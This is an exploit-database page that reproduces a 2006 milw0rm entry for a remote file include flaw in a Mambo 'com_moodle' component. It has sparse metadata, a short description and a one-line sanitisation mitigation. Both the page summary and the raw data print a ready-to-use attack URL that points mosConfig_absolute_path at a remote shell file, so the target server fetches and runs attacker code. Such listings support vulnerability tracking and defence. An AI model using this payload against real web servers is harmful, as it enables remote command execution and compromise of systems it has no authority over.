header-logo
Suggest Exploit
vendor:
Moodle
by:
jank0
N/A
CVSS
N/A
Remote File Include
98
CWE
Product Name: Moodle
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mam – Moodle Remote File Include

This bug allows a remote attacker to execute commands via Remote File Include (RFI). The vulnerable path is ?mosConfig_absolute_path= and the exploit is http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Mitigation:

Ensure that user input is properly sanitized and validated before being used in web requests.
Source

Exploit-DB raw data:

####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt

Contact: irc.undernet.org #hackbsd

# milw0rm.com [2006-07-23]

Navigation

Suggest Exploit

Services By CQR